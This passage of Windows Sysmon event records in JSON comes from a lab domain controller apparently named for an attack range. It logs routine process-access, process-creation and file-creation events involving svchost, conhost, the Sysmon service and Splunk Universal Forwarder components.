{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","TargetProcessId":"4604","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.070\r\nSourceProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nSourceProcessId: 4604\r\nSourceThreadId: 3392\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.070","SourceProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","SourceProcessId":"4604","SourceThreadId":"3392","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:56:54.539\r\nProcessGuid: {A837DB8D-041F-5F25-0000-0010A1820B00}\r\nProcessId: 4124\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\101c-0\\System.Core.dll\r\nCreationUtcTime: 2020-08-01 05:56:54.539","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:56:54.539","ProcessGuid":"{A837DB8D-041F-5F25-0000-0010A1820B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\101c-0\\System.Core.dll","CreationUtcTime":"2020-08-01 05:56:54.539","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.603\r\nProcessGuid: {A837DB8D-0426-5F25-0000-00103E900B00}\r\nProcessId: 4528\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.603","ProcessGuid":"{A837DB8D-0426-5F25-0000-00103E900B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0426-5F25-0000-00103E900B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0426-5F25-0000-00103E900B00}","TargetProcessId":"4528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0426-5F25-0000-00103E900B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0426-5F25-0000-00103E900B00}","TargetProcessId":"4528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 